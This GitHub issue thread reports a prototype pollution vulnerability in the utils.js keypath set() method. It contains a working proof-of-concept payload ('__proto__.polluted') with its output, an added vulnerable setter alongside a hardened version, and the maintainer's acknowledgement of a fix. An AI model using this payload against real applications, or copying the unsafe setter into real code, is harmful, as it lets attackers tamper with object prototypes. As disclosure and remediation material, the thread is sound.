
Prototype Pollution #6

Closed
P0cas opened this issue Nov 30, 2021 · 4 comments
Labels
bug Something isn't working

Comments

@P0cas

P0cas commented Nov 30, 2021

Summary

Hello @fabiocaccamo and @snyk.

This time I really found Prototype Pollution! lol.

I discovered a prototype pollution vulnerability via utils.js method analysis.

```js
// Excerpt from utils.js (utils.object.keypath); TypeUtil.isObject is the library's own helper.
set: function(obj, path, value)
{
    var keys = path.split('.');
    var key;
    var cursor = obj;
    for (var i = 0, j = keys.length; i < j; i++) {
        key = keys[i];
        if (!TypeUtil.isObject(cursor[key])) {
            cursor[key] = {};
        }
        if (i < (j - 1)) {
            cursor = cursor[key];
        } else {
            cursor[key] = value;
        }
    }
}
// https://github.com/fabiocaccamo/utils.js/blob/master/dist/utils.js#L2360
```

If you check the set() method of utils.object.keypath, you can see that the value of the path parameter is split on dots, and then the value of the value parameter is merged into the object based on the key value. This means that it can be exploited for prototype pollution.

```js
const utils = require("@fabiocaccamo/utils.js");
const obj = {};
const fake_obj = {};

console.log(`[+] Before prototype pollution : ${obj.polluted}`);
utils.object.keypath.set(fake_obj, '__proto__.polluted', true);
console.log(`[+] After prototype pollution : ${obj.polluted}`);

/*
[+] Before prototype pollution : undefined
[+] After prototype pollution : true
*/
```

I wrote the PoC as above!

A prototype pollution vulnerability has occurred and you can see the object being polluted. To patch this vulnerability, use the Object.freeze() method, or the key value must be verified (e.g. `__proto__`).
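As an added example (not the issue's PoC and not the project's own fix, which is in commit 102efaf below): a minimal setter with the same traversal logic as the reported set(), beside a hardened variant that rejects prototype-walking keys and only descends into own properties, plus a demo() that runs both against the issue's payload. The isObject helper stands in for TypeUtil.isObject and is an assumption.

```javascript
const isObject = (v) => v !== null && typeof v === 'object'; // stand-in for TypeUtil.isObject (assumed)

// Vulnerable: same traversal as the reported set(); '__proto__' in the
// path walks into Object.prototype and the final assignment lands there.
function setUnsafe(obj, path, value) {
  const keys = path.split('.');
  let cursor = obj;
  for (let i = 0; i < keys.length; i++) {
    const key = keys[i];
    if (!isObject(cursor[key])) cursor[key] = {};
    if (i < keys.length - 1) cursor = cursor[key];
    else cursor[key] = value;
  }
}

// Hardened: refuse prototype-walking keys up front, and only descend into
// own properties so an inherited object is never used as the cursor.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function setSafe(obj, path, value) {
  const keys = path.split('.');
  if (keys.some((k) => FORBIDDEN.has(k))) {
    throw new Error(`refusing unsafe key path: ${path}`);
  }
  let cursor = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    if (!Object.prototype.hasOwnProperty.call(cursor, key) || !isObject(cursor[key])) {
      cursor[key] = {};
    }
    cursor = cursor[key];
  }
  cursor[keys[keys.length - 1]] = value;
}

// Runs both setters against the issue's payload and reports whether a fresh
// object inherited `polluted`; restores Object.prototype before returning.
function demo() {
  const result = {};
  setUnsafe({}, '__proto__.polluted', true);
  result.unsafePolluted = ({}).polluted === true;
  delete Object.prototype.polluted;
  let threw = false;
  try { setSafe({}, '__proto__.polluted', true); } catch (e) { threw = true; }
  result.safeThrew = threw;
  result.safePolluted = ({}).polluted === true;
  const target = {};
  setSafe(target, 'a.b.c', 1);
  result.normalWorks = target.a.b.c === 1;
  return result;
}
```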

@fabiocaccamo
Owner

@wjddnjs33 thank you for reporting this, feel free to submit a PR with the relative test.

@fabiocaccamo fabiocaccamo added the bug Something isn't working label Nov 30, 2021
@P0cas
Author

P0cas commented Nov 30, 2021

Yeah, I just created a pull request.

fabiocaccamo added a commit that referenced this issue Dec 6, 2021
@fabiocaccamo
Owner

@wjddnjs33 just FYI, this is what I was asking for:
102efaf

@P0cas
Author

P0cas commented Dec 7, 2021

thank you! Next time, I will give you a PR as above.
